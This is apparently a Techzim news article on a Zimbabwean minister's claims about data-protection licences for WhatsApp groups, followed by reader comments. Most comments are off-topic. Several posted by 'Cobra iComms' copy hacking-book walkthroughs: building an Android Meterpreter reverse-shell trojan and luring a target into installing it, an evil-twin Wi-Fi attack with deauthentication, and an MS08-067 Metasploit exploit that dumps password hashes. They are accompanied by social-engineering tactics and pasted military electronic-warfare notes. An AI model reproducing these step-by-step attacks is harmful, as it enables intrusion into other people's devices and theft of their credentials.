The Minister is right, there’s no $2500 fine for unlicensed WhatsApp groups, it’s $1000 and 7 years imprisonment

WhatsApp voice note to text pause record

There’s never a shortage of drama in Zimbabwe and the latest involves the Minister of ICT, Tatenda Mavetera. She said something that affects the all-important WhatsApp and tempers flared across the country.

This is an excerpt of the quote the got the country’s blood boiling:

The time is ticking for organisations that collect first party data, as you are required by law to have a data protection licence and the license fees range from $50 to $2500…

Even churches who collect personal data ought to have such a licence and appoint a DPO. Whatsapp group admins are not spared too, if your groups are meant for business, you should as well obtain a licence. Failure to comply attracts penalties.

As you would imagine, Zimbabweans did not like this one bit and there was plenty of commentary on it. The Minister then came back with some clarification:

False claim of USD 2500 penalties for WhatsApp Group Administrators

I would like distance myself from the malicious fake news of intentions by government to licence or penalise WhatsApp Groups or Administrators of any social media platform/s USD 2500.

This claim is not applicable especially to players who do not collect and process Personally Identifiable Information (PII) for commercial or business use.

Personally identifiable information (PII) is any type of data that can be used to identify someone, from their name and address to their phone number, passport information and I.d number.

The public is encouraged to disregard this notice with the uttermost discontent it deserves as it is inconsistent with our legal provisions as espoused in Statutory Instrument (SI) 155 of the 2024 Cyber and Data Protection (Licencing of Data controllers and Appointment of Data Protection Officers) Regulations.

On my LinkedIn post I never expressed any intentions to licence or penalise WhatsApp groups or Administrators of any social media platform/s which do not collect and process (Personally Identifiable Information (PII) for commercial or business use…

Where are you getting $2500?

Let’s be fair on this. I will assume that there were people who misunderstood the original post and assumed it meant there would be $2500 fines for using WhatsApp groups without a data protection licence.

The original post and a reading of the relevant Statutory Instrument said data protection licence fees ranged from $50-2500. We went through how much you should expect to pay for your bussiness-focused WhatsApp group here.

That’s not to say the penalty for not having the licence is $2500. It’s clear that this is where the confusion came from. The $2500 is the licence fee for data controllers that collect data for over 500,000 people.

No WhatsApp group is that big. Instead, most WhatsApp groups (for business use) will pay $50 for a group of less than 1000 people.

However, this doesn’t mean there won’t be penalties. In fact, Individuals or entities that process personal information without a data controller licence may face a fine up to level 11 or imprisonment for up to seven years, or both.

Chapter 3(3) of the Statutory Instrument 155 of 2024 says:

Any person who processes personal information in terms of this section without a data controller licence within the stipulated time frames shall be guilty of an offence and liable to a fine not exceeding level 11 or to imprisonment for a period not exceeding seven years or to both such fine and such imprisonment.

It’s just $1000 and 7 years in jail

A level 11 fine is up to $1000. So, we’re talking possibly being fined $1000 and spending 7 years in jail for running a 50-member WhatsApp group.

Yes, that includes WhatsApp group admins for groups of over 50 people. That’s because phone numbers are considered personal information. The Minister rightly says Personally Identifiable Information includes phone numbers and that’s why WhatsApp groups will be affected.

So, when the Minister says she is distancing herself from the statement that people are being charged $2500, she can honestly say that.

However, she should have gone on to explain that it’s just $1000 and 7 years imprisonment. I don’t see how that’s any better than the $2500 fine she is distancing herself from.

The Minister says she never expressed any intentions to licence or penalise WhatsApp groups or Administrators of any social media platform/s which do not collect and process (Personally Identifiable Information (PII) for commercial or business use.

However, the law she is standing on says they can or rather should be penalised. I don’t think you will be able to protest in court that the Minister said she never expressed intentions to licence or penalise you.

If the law applies, you will have no recourse, regardless of what the Minister says. The law is clear, WhatsApp admins should be punished. So rather than distance herself from obvious mistakes in the commentary, she should grapple with the meat of the SI in question.

It’s ridiculous and she should say that and maybe help get the ball rolling on getting the law amended.

Anyway, that’s what I think of the whole fiasco. Do chime in if you have thoughts on this.

Also read:

27 comments

What’s your take?

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

  1. Operations Manager E. M.

    Personally, I think this law is overly harsh and unnecessary. As whatsApp group admins we shouldn’t face such severe penalties. We are quite aware that phone numbers are considered personal information. The Minister should reconsider this law and its implications on citizens’ freedom of expression and access to information.

    I’m currently concerned with the imposed excessive penalties. Clearly $1000 and 7 years imprisonment is too much of a penalty for WhatsApp group admins. I mean, we just regular people doing regular business. This is restriction of freedom. I’m sure you can all attest that this law could potentially restrict citizens’ freedom of expression and access to information. It also affect small businesses and individuals like myself who are basically trying to earn a living.

    I think it’s best if they reconsider the statutory instrument and its implications and engage citizens and stakeholders in discussions about data protection and privacy and also implement more reasonable penalties for data protection offenses.

  2. Cobra Commando💀✖️

    When do IP addresses runout guys, we should be at 1Pv6 by now. Haven’t been tracking international tech news for a while, perhaps went global again.

    The story is when the internet was created it was meant for military use. Sir Tom Berners Lee* then created HTML so ordinary people could use it.

    The inherent flaw, not really a flaw but the thinking was not many devices would need it, then came the data explosion, then we started running out of IP addresses. The new ones look strange though but they won’t, fingers crossed run out, at least thats the thinking.

    Regular IP: 5.185.145.139

    IPv6: 5n.18a.bb8.3fd…or something like that, its confusing but necessary.

    1. Garikai

      1) We have covered this here on Techzim.
      2) We are not about to run out, we ran out.
      3) Zimbabwe already uses IPv6. Liquid does although some ISPs just block it.

  3. Nico

    This will all be rendered moot when WhatsApp introduces user names. The solution in the mean time may be to switch groups over to telegram, since it already has usernames, and you can join a group without your number being known. It was a cute plan though.

  4. Cobra Commando💀✖️

    For sale, Sparta, 7 Rooms plus kitchen and shower. $36,000 Neg.

    5790 Unit J, Seke South, Chitungwiza

    Come through, tinapangana.

  5. Cobra Commando💀❌

    Might I also add 7 years in a maximum security prison might not be that bad after all.I can only imagine the stories those inmates would share.Someof them were incarcerated but are innocent.The meals not for gratification but for sustinence.

    The trading in cigarettes,the sculpting of chess pieces from sadza,the lack of vitamin D,the prison uniforms,the sketchy guards selling cellphones,the commissary,the snacks from visitors gold in the pen.

    It’s really a different life in there and sampling it for 7 years might be too much but a year or two I’d survive.

    I’ll follow you everywhere.

  6. The Silent Observer

    That law may not actually be waiting for ordinary groups but of a certain political party so as to tap into their conversations, get their numbers and names and addresses for easier access when the party wants to stage a rally, private meeting or demonstration. All other groups will not be affected.
    Mark my post.

  7. Always Off Topic

    What’s happening to the world, here we have Vene and his crew, on the other side of the planet there is Trump and his crew, then there is Putin trying to convince everyone he’s still got game, while the Chinese quietly takeover of the world. It feels like silly season came back with a vengeance.

    1. Dzidzai Paul Chidumba

      Always off topic misinformed sham of journalism at display heed these claims to be honest with me coz Whatsapp was a small thing of the time women are you doing today your calculations and I was like it they’re not responding now I can cook with spaghetti noodles and company in the world pa economy military etc etc nothing to the right to the man stays in a private chart and I will be home in about an image of a sequel do you think you meant snorting Adderall and then we can deduce that men are more than men are supposed to the right time to be honest I don’t think r u vs Liverpool NY state of the time women are the specs you need anything else will be playing against the wall that fell off the top of my head I was just business and I will be playing with t mobile data connection to the right to the right tools monitor groups and then we can deduce that men in black international marketing waunoziva here in the morning are you still at school and you can get it done

  8. System manager@yomall

    This is all unnecessary and unprofessional, what if you are just a teenager try to start a small business??. This will drive more citizens out of the country.

  9. Maladministration

    We have to deak with a gvt focused on censorship and micromanaging breadcrumbs. Any smart minister would have figured out how dumb the idea of managing whatsapp groups and taxing them is. Regardless of it being the law, it exposes the level of a person’s smarts and where some lights are dim or rarely turn on. Mavetera’s high-school kind of argument betrays her wits, if any she had. And it made me think under the present gvt which female minister has ever exhibited something plausible, that would have her set apart from the mediocrity that we are seeing today

  10. asadmal051@gmail.com
  11. Cobra Commando💀✖️

    Vineyard WhatsApp Group🍇

    I have just seen an aeroplane going full throttle over Sparta ^, unmarked underbelly, heading South East.

    I don’t know of many routes going South East, if it continues in that direction it will get to Maputo, not OR Tambo.

    Air Zimbabwe, brace yourself! We need an expansion into regional routes linked to the African Free Trade Area, the closer ones first.

    For planes I know you guys can come up with something even if they call them bhero oro lease or hire purchase.

    I cannot get my head around that there is no direct flight to Maputo…

    Maputo🇲🇿
    Kinshasha🇨🇩
    Lilongwe🇲🇼
    Luanda🇦🇴
    Lusaka🇿🇲

    Air Zimbabwe Regional Jet 🚀🇿🇼

    50 and 200 seaters mixed?

    Embraer
    Bombadier
    …..? —-> +-14 years Local Variant.

  12. Anonymous

    Adapt and move on. If Whatapp does not fit your needs consider another platform that does meet your needs. Whatsapp with usernames????

  13. Cobra iComms 💻

    Exploiting a Mobile Device Remotely
    Kali Linux, a known toolkit for exploiting computers, is also one of the most efficient tools to perform a
    hack on a mobile device. Follow these steps to perform a remote hack on a mobile device and install a
    malicious file on a targeted device.
    1. Pull up Kali Linux
    Type the following command:
    msfpayload android/meterpreter/reverse_tcp LHOST=[your device’s IP address] R >
    /root/Upgrader.apk
    2. Pull up a new terminal
    While Kali is creating your file, load another terminal and load the metasploit console. To do that,
    enter the command:
    Msfconsole
    3. Set up the listener
    Once metasploit is up, load the multi-handler exploit by entering the command:
    use exploit/multi/handler
    Afterward, create the reverse payload by typing the following command:
    set payload android/meterpreter/reverse_tcp
    Next, you will need to set up the L host type in order for you to start receiving traffic. To do that,
    type the following command:
    set LHOST [Your device’s IP address]
    4. Start the exploit
    Now that you have your listener ready, you can now start your exploit by activating your listener.
    To do this, type the command:
    Exploit
    If the malicious file or Trojan that you have created a while ago is ready, copy it from the root
    folder to your mobile device, preferably an android phone. Afterwards, make that file available by
    uploading it on any file-sharing site such as speedyshare or Dropbox. Send the link to your target,
    and ask him to install the app.

    Once your target user has installed the file, you can now receive the traffic that he is receiving
    through his mobile device!

  14. Cobra iComms 💻

    Social Engineering as Art and Science
    The logic behind social engineering is simple – it can be easy to get all the information and access that one
    needs from any person as long as you know how to trick a person into giving you the data you need with
    the least resistance possible. By being able to pull off a social engineering trick, you will be able to get your
    hands on to a device, account, or application that you need to access in order to perform bigger hacks or
    hijack an identity altogether. That means that if you are capable of pulling of a social engineering tactic
    before attempting to go through all other hijacking tactics up your sleeve, you do not need to make
    additional effort to penetrate a system. To put this entire concept into simpler terms, social engineering is
    a form of hacking that deals with manipulation of victims through social interaction, instead of having to
    break right away into a computer system.
    What makes social engineering difficult is that it is largely based on being able to secure trust, which is only
    possible by getting someone’s trust. For this reason, the most successful hackers are capable of reading
    possible responses from a person whenever they are triggered to perform any action in relation to their
    security system. Once you are able to make the right predictions, you will be able to get passwords and
    other valuable computer assets without having to use too many tools.
    Since social engineering is mostly about psychology, you can consider this tactic as both an art and a
    science. This tactic involves a great deal of creativity and ability to decipher nonverbal language of a device
    or account owner. Social engineering experts are able to compile tactics that seem to work against
    computer users all the time.
    Together with other types of hacks available, you will realize that social engineering is that part of the most
    successful attacks, and that attacks mostly work because of some form of mental trickery performed by a
    hacker. Social engineering makes it possible for a person to simply log in personal information on any form
    he sees, or freely open an attachment that has embedded malware.
    Because social engineering’s goal is to dupe someone into providing information that will allow access to a
    more valuable data, this hacking tactic will allow you to get mostly anything from a targeted system. What
    makes it a good tactic is that you can phish for a gateway to the information that you want to hack from
    mostly anyone that has access to the system that you are targeting, from receptionists to IT personnel,
    with these steps:
    1. Research
    2. Creation of trust
    3. Exploitation of relationship by communicating with targeted individual
    4. Using information leaked for malicious gain
    The art and science behind social engineering are created because of a single truth about information
    security – security ends and begins with a user’s knowledge on how a system should be protected. No
    matter how updated your security system is, you will never be able to protect your network and your devices if there is a user on your end that is not capable of keeping vital information from potential
    attackers. With this thought comes the idea that once a social engineer becomes more aware of who
    should be targeted within the organization for critical information.

  15. Cobra iComms ☔

    How Social Engineering Happens
    If you are going to think like a social engineer, you will get the idea that the most vulnerable people within
    any organization are those that are very likely to give away information with the least possible resistance.
    With that thought, you can easily zero in on receptionists, call center agents, and others that are trained to
    divulge information to anyone who asks for them. It’s safe to assume that next in line are end users who
    are naïve enough to think that they can provide personal information to those who pretend to be technical
    support personnel, supervisors, or people who can provide them a reward for merely answering a question
    that may leak out the answer to a privacy question.
    Since social engineering highly rests on the behavior of users towards information security, people who are
    most susceptible to attacks are the following:
    1. People who divulge too much information about their personal lives
    2. People who create passwords using their own names, birthdays, or pet’s name
    3. People who divulge information about the devices that they are using
    4. People who use the same passwords for almost every account
    5. People who do not physically secure their own devices, or any documents that may point out
    details about information security protocols
    As long as you can gain access to these types of people, then you can easily pry on any information that
    you want to gain without having to spend too much effort. By being able to locate these types of users in
    any organization, you will be able to get as much valuable data as you can as if you have had access to all
    targeted devices.

  16. Cobra iComms ☔

    The Evil Twin Hack
    While many beginning hackers are excited to hack Wi-Fi passwords to enjoy free bandwidth, there are
    network connection hacks that are more powerful and provide better access than a free internet
    connection. Among these hacks is the evil twin access point hack.
    The evil twin AP is a manipulative access point that appears and behaves like a usual access point that a
    user connects to in order to connect to the internet. However, it is usually used by hackers to make
    targeted victims to their access point. This allows a hacker to see all the traffic that comes from the client,
    which gives way to a very dangerous man-in-the-middle attack.
    Follow the steps to do an evil twin access point attack:
    1. Fire up Backtrack and start airmon-ng.
    Check if the wireless card is running by entering the command:
    bt > iwconfig
    2. Put the wireless card into monitor mode
    Once you see that the wireless card is recognized by Backtrack, place it on monitor or promiscuous
    mode by entering the command:
    bt >airmon-ng start wlan0
    3. Fire up airdump-ng
    Start capturing all the wireless traffic that the wireless card can detect by entering the command:
    bt > airodump-ng mon0
    After doing that, you will be able to see all the access points within range. Locate the access point
    of your target
    4. Wait for the target to connect
    Once the target connects to the access point, copy the BSSID and the MAC address of the system
    you want to hack.
    5. Create an access point with the same
    credentials
    Pull up a new terminal and type this command:
    bt > airbase-ng -a [BSSID] –essid [“SSID of target”] -c [channel number] mon0
    This will create the access point, or the evil twin, that you want your target to connect to.
    6. Deauthenticate the target
    In order for him to connect to the evil twin access point, you need to bump the target off the
    access point that he is connected to. Since most wireless connections adhere to the 802.11 which
    has deauthentication protocol, his access point will deauthenticate everyone that is connected to
    it. When the target’s computer tries to reconnect to the internet, he will automatically connect to
    the AP with the strongest signal, which is the evil twin access point that you have just created.
    In order to do that, you need to make use of the following command:
    bt > aireplay-ng –deauth 0 -a [BSSID of target]
    7. Turn up the signal of the evil twin
    Now, here is the crucial part – you need to make sure that the fake access point’s signal that you
    have just created is as strong as or stronger than the original access point. Since you are attacking
    from a distance, you can almost deduce that his own WiFi connection has much stronger signal
    than yours. However, you can use the following command to turn up the signal:
    iwconfig wlan0 txpower 27
    Entering this command will boost your access point’s power by 500 milliwatts, or 27 dBm.
    However, take note that depending on your distance from the target, 500 milliwatts may not be
    enough for him to stay connected to the evil twin. However, if you have a newer wireless card, you
    can boost the access point’s signal up to 2000 milliwatts, or four times what is legal in the US.
    8. Change your channel
    This step comes with a warning: it is illegal to switch channels in the US, and before you proceed,
    see to it that you have special permission as an ethical hacker.
    There are certain countries that allow better Wi-Fi power, which can aid you in maintaining the
    signal strength of your evil twin access point. For example, Bolivia allows its internet users to
    access the Wi-Fi channel 12, which comes with a full power of 1000 milliwatts. To change the
    signal channel of your wireless card to match Bolivia’s, enter the following command:
    iw reg set BO
    Since your channel will now allow you to increase the power of your access point, you can further
    increase the signal of your evil twin by entering the command:
    iwconfig wlan0 txpower 30
    Now, check the power of the evil twin’s access point by typing iwconfig.

  17. Cobra iComms ☔

    Other Ways to Uncover Passwords
    As mentioned earlier, the easiest way to crack a password is to have physical access to the system that you
    are trying to hack. If you are not able to make use of cracking tools on a system, you can use the following
    techniques instead:
    1. Keystroke logging
    This is easily one of the most efficient techniques in password cracking, since it makes use of a
    recording device that captures keystrokes as they are typed in a keyboard. You can use of a
    keyboard logging software, such as the KeyLogger Stealth and the Spector Pro, or a keylogging
    hardware such as the KeyGhost.
    2. Searching for weak password storages
    There are too many applications in most computers that store passwords locally, which make
    them very vulnerable to hacking. Once you have physical access to a computer, you can easily find
    out passwords by simply searching for storage vulnerabilities or making use of text searches. If you
    are lucky enough, you can even find stored passwords on the application itself.
    3. Weak BIOS Passwords
    Many computers allow users to make use of power on passwords in order to protect hardware
    settings that are located in their CMOS chips. However, you can easily reset these passwords by
    simply changing a single jumper on the motherboard or unplugging the CMOS battery from the
    board. You can also try your luck and search online for default user log in credentials for different
    types of motherboards online.
    4. Grab passwords remotely
    If physical access to the system or its location is impossible, you can still grab locally stored
    passwords on a system running on a Windows OS from remote location and even grab the
    credentials of the system administrator account. You can do this by doing a spoofing attack first,
    and then exploiting the SAM file on the registry file of the targeted computer by following these
    steps:
    1. Pull up Metasploit and type the following command: msf > use
    exploit/windows/smb/ms08_067_netapi
    2. Next, enter the following command: msf (ms08_067_netapi) > set payload
    /windows/meterpreter/reverse_tcp
    After doing so, Metaploit will show you that you need to have the target’s IP address (RHOST) and the IP address of the device that you are using (LHOST). If you have those
    details already, you can use the following commands to set the IP addresses for the
    exploit:
    msf (ms08_067_netapi) > set RHOST [target IP address]
    msf (ms08_067_netapi) > set LHOST [your IP address]
    3. Now, do the exploit by typing the following command:
    msf (ms08_067_netapi) > exploit
    This will give you a terminal prompt that will allow you to access the target’s computer
    remotely.
    4. Grab the password hash
    Since most operating systems and applications tend to store passwords in hashed for
    encryption purposes, you may not be able to see the user credentials that you are after
    right away. However, you can get these hashes and interpret them later. To grab the
    hashes, use this command:
    meterpreter > hashdump
    After entering this, you will see all the users on the system you are hacking, and the hashed
    passwords. You can then attempt to decrypt these hashes using tools such as Cain & Abel.

  18. Cobra iComms ☔

    How to Crack Passwords
    If it is not possible for a hacker to know a user’s password through inference, social engineering, and
    physical attack (to be discussed in detail in later chapters), he can instead use several password cracking
    tools, such as the following:
    1. Cain & Abel – used to crack NT and LM (NTLM) LanManager hashes, Pic and Cisco IOS hashes,
    Radius hashes, and Windows RDP passwords.
    2. Elmcomsoft Distributed Password Recovery – cracks PKCS, Microsoft Office, and PGP
    passwords. It can also be used in cracking distributed passwords and recover 10,000
    networked computers. It also makes use of GPU accelerator which can increase its cracking
    speed up to 50 times.
    3. Elcomsoft System Recovery – resets Windows passwords, resets all password expirations, and
    sets administrative credentials.
    4. John the Ripper – cracks Windows, Unix, and Linux hashed passwords
    5. Ophcrack – makes use of rainbow tables to crack Windows passwords
    6. Pandora – cracks offline or online user passwords for Novell Netware accounts
    7. Proactive System Password Recovery – recovers any password stored locally on a Windows
    operating system. This includes passwords for logins, VPN, RAS, SYSKEY, and even WEP or WPA
    connections.
    8. RainbowCrack – cracks MD5 and LanManager hashes using the rainbow table.
    Take note that some of these tools may require having physical access to the system that you want to
    hack. On the same vein, keep in mind that once a hacker has physical access to a system that you intend to
    protect, he would be able to dig into all password-protected or encrypted file that you have, as long as he
    has the right tools.
    When testing out tactics for cracking passwords, one of the most important things that you need to
    remember is that the technique that you need to test will be based on the type of encryption of the
    password that you need to crack. Also, if you are testing out password-cracking hacks, you may also need
    to remember that it is possible for certain systems to lock out associated users, which may cause denial of 
    service to users who are using the network.

  19. Cobra iComms ☔

    Chapter 5: Hacking Tools
    Both ethical and criminal hackers have access to abundance of hacking tools that can be used to either
    attack or protect a particular system. These tools can be crowd-sourced from the internet through forums
    and other online hubs dedicated to hackers.
    As a beginning ethical hacker, it is very important that you learn the most commonly used tools to detect
    possible vulnerabilities, conduct tests, and administer actual hacks. Here are 8 of the most popular tools
    used by hackers today:
    1. Angry IP Scanner (ipscan)
    Most popularly called as ipscan by seasoned hackers, this tool is used to track computers through
    their IP addresses and also to snoop for ports to check for gateways that will lead them straight
    into a targeted computer system. This tool is also commonly used by system engineers and
    administrators to check for possible vulnerabilities in systems that they are servicing.
    This tool is open source and can be used across platforms, and is lauded for being one of the most
    efficient tools for hacking that is available on the market.
    2. Kali Linux
    Launched in 2015, this application is one of the favorites of hackers because of the abundance of 
    features. This security-centered toolkit allows you to run it right from a CD or through a USB,
    without need for any installation.
    This toolkit contains most of the interfaces that you need for hacking, which includes creation of 
    fake networks, spoof messages, and even crack WiFi passwords.
    3. Cain & Abel
    Cain & Abel is one of the most efficient hacking toolkits that work well against Microsoft operating
    systems. This tool allows you to recover wireless network passwords, user account passwords, and
    use a few brute force methods when it comes to cracking passwords. You can also use it to record
    VoIP conversation sessions.
    4. Burp Suite
    Burp Suite is one of the most essential tools that you can use when you want to map out
    vulnerabilities on a website. This tool allows you to examine every cookie that resides on a
    website, and also start connections within website applications.
    5. Ettercap
    This tool is efficient when it comes to launching man in the middle attacks, which is designed to
    make two different systems believe that they are communicating with each other, but a hacker is
    secretly relaying a different message to the other. This tool is efficient in manipulating or stealing
    transactions or transfer of data between systems, or to eavesdrop on a conversation.
    6. John the Ripper
    This is one of the best brute force password crackers which use the dictionary attack. While most
    hackers may think that brute force tactics involve too much time to crack a password, John the
    Ripper is known to be one of the more efficient tools when it comes to recovering encrypted
    passwords.
    7. Metasploit
    Metaspoit is widely acclaimed among hackers because it is an efficient tool when it comes to
    identifying possible security issues and also to verify mitigations of system vulnerabilities. It also is
    one of the best cryptography tools for hackers since it is also efficient when it comes to masking
    identities and locations of an attack.
    8. Wireshark and Aircraft-ng
    These tools are used together to detect wireless connections and hack user IDs and passwords on
    a WiFi connection. Wireshark serves as a packet sniffer, and Aircraft-ng serves as the packet
    capturing suite that will also allow you to use a variety of other tools to monitor WiFi security.
    Now that you have a list of tools that you can use to practice hacking and to also discover vulnerabilities in
    your own system, you can now dig deeper right into the most common hacking tactics….

  20. Cobra iComms ☔

    Doing System Scans
    Once you know how you can actively gather information about your network, you will have an idea on how
    criminal hackers would possibly launch an attack against your network. Here are some of the things that
    you can do to see how vulnerable your system is:
    1. Use the data you found on your Whois searches to see how related hostnames and IP addresses can be
    laid out. For example, you can verify information on how some internal hostnames, operating protocols,
    running services, open ports, and applications are displayed on a web search, which may give you an idea
    on how criminal hackers may soon infiltrate your system.
    2. Scan your internal hosts and know what possibly rogue users may access. Keep in mind that an attacker
    may come from within your organization and set up shop in one of your hosts, which can be very difficult
    to point out.
    3. Check your system’s ping utility, or use a third-party utility that enables you to ping different addresses
    simultaneously. You can do this by using tools such as NetScan Tools, fping (if you are using Unix), or
    SuperScan. If you are not aware of what your gateway IP address is, you can search for your public IP
    address by going to http://www.whatismyip.com.
    4. Do an outside-in scan of your system by scanning for open ports. To do that, you can use tools such as
    Nmap or Superscan, and then check what others can see on your network traffic by using tools such as
    Wireshark or Omnipeek.
    By doing this scan, you can get an idea on what other people can see when they scan your public IP address
    and then connect a workstation right into a hub or switch on your router’s public side.
    Once you are able to scan open ports, you will be able to realize that outsiders who are doing sweeps on
    your open ports can easily find the following information:
    VPN services that you are running, such as IPSec, PPTP, and SSL
    Services that are running on your ports, such as email, database apps, and web servers
    Authentication requirement for sharing across netwoks
    Remote access services available on your system, such as Remote Desktop, Secure Shell, VNC, and
    Windows Terminal Services.

  21. Cobra iComms ☔

    3. Denial of Service (DoS) and Distributed Denial of Service (DDoS)
    A DoS attack is defined as the denial of access or service to a legitimate user – you can see that all
    services that are running on your computer are slowing down or quit suddenly as you use them. A
    DDoS attack, on the other hand, involves a larger number of systems that have been previously
    compromised by a hacker to attack a particular target.
    While DoS and DDoS attacks are not used to destroy a target’s security system or to steal data, it
    can be used to generate profit loss or to render a computer system entirely useless while it is being
    used. Usually, these attacks are made to create a temporary loss in connectivity on a network and
    deny all related services. In certain occasions, these attacks can also work to destroy certain files and programs on a targeted computer.
    A DoS or a DDoS attack is very similar to having a slow internet connection and a slow computer at
    the same time. During such an attack, you may feel that your network’s performance is unusually
    slow and you cannot access any website. At the same time, it is also relatively easy to find out if 
    you are being targeted for an attack – you may see that you are receiving too much spam or other
    signs of unusual traffic.
    Now that you have an idea on the types of attacks that a hacker may launch, it’s time for you to learn how
    a hacker can launch them and prepare yourself to do countermeasures.

    Denial of Service attack –This attack can be done when the ARP
    spoofing is done to link several multiple IP addresses to a targeted device’s MAC address. What
    happens in this type of attack is that all the data that is supposedly sent to other IP addresses are
    instead redirected to a single device, which can result in a data overload.

    I hope you can make your systems more secure with this information, every organisation, agency and battalion needs to view hacking very seriously, the very best hackers were never there.

  22. Cobra Commando💀✖️

    (U//FOUO) Cyber vs EW
    (U//FOUO) Cyber is an emerging capability for
    combat commanders and currently come with added
    restrictions due to the nature of that capability.
    Commanders should be aware that similar effects
    can be achieved with EW as with cyber if properly
    articulated during the planning and orders
    production process. Commanders should become
    familiar with these concepts and plan with respect to
    their effects in the battle space instead of what
    assets are used

    (U) Cyber-attacks can effectively shape the
    battlefield and require very little risk on the part of the
    perpetrator.

    (U) Because of manuva warfare’s reliance on communication, Russia has invested heavily in
    Electronic Warfare systems which are capable of shutting down communications and signals across a broad spectrum. This capability is grouped under the concept of the Radio Electronic Battery (REB). The
    REB’s objective is to degrade or deny that vital capability to tactical and operational commanders. The
    Russians do not have a one size fits all approach, but rather possess a suite of platforms, each designed
    to counter an adversaries communications capability.

    The Russians layer these systems to shut down FM,
    SATCOM, cellular, GPS, and other signals. In Eastern Ukraine, these EW systems have proved devastating
    to Ukrainian radio communications, are capable of jamming unmanned aircraft systems (UAS), and can
    broadcast false GPS signals (an effect called spoofing).

    (U) ELECTRONIC WARFARE
    (U//FOUO) The key cornerstone of U.S. and NATO methodology is maneuver (manuva) warfare. Maneuver warfare depends on communication and synchronization of assets. The U.S. has communication infrastructure down to the four man Infantry Fire Team level and the ability to battle track those formations with almost real-time speed.

    SPR-2 (RTUT)
    PRIMARY PURPOSE: Counter Artillery/Defeat
    Radio Proximity Fuse Munitions
    COVERAGE AREA: 50 hectares
    INTO/OUT OF ACTION: Not more than 4 min
    CREW REQUIREMENTS: 2 PAX

    R330 SERIES
    PRIMARY PURPOSE: Electronic Jamming/DF
    SEARCH COVERAGE: 360 Degrees
    DF ERROR: Not more than 3 degrees
    EFFECTIVE SIGNALS: AM, FM, CW, SSB, ISB, FSK, PSK, PFT
    CREW: 4 PAX
    SETUP/TAKEDOWN: 20/15 minutes

    RP-377 L/LA
    PRIMARY PURPOSE: Direction Finding/Monitoring
    FREQUENCY RANGE: 20-2000 Detection/25-2000
    Direction Finding
    DIRECTION OF ERROR: Not more than 3 degrees
    INTO/OUT OF ACTION: Not more than 20 min/10
    min
    CREW: 2-3 PAX

    1. Dzidzai Chidumba

      Grow a pair

  23. Cobra Commando💀✖️

    Hannibal from Tunisia went to war with Elephants, Bees, Snakes and a mixed race army, very unconventional at the time, but he was effective until the last moment, not sure what happened but he left Rome unsacked. Off course he was to pay for this, there is a video game about this, Rome Total War. I played the previous Total War version, Napoleon. Immerse game, very tactical.

    One of my versions of artillery fire. Mamba cocktail, large clay pot, live black mambas on an air cushion of something to break the fall. Then you write a little note inside. Then your hurl 100 pissed Black Mambas into an enemy camp at night. Crash, the clay pot breaks! Ma1 atanga, just listen to the pandemonium, take a video for posterity.

  24. Internet Mafia

    The minister should not be the one ahead of this, it should be Potraz. They are the ones dealing with implementation, monitoring and compliance. According to them they will not be focusing on social media. It has been asked and they said so. Now it looks like they are keeping quiet to save face for the minister who keeps talking out the side of her neck. She spoke on a issue she was not well versed with. Instead of making high level comment she went into specifics which I doubt she knows much about and it shows.

Join Waitlist We will inform you when the product arrives in stock. Please leave your valid email address below.
Exit mobile version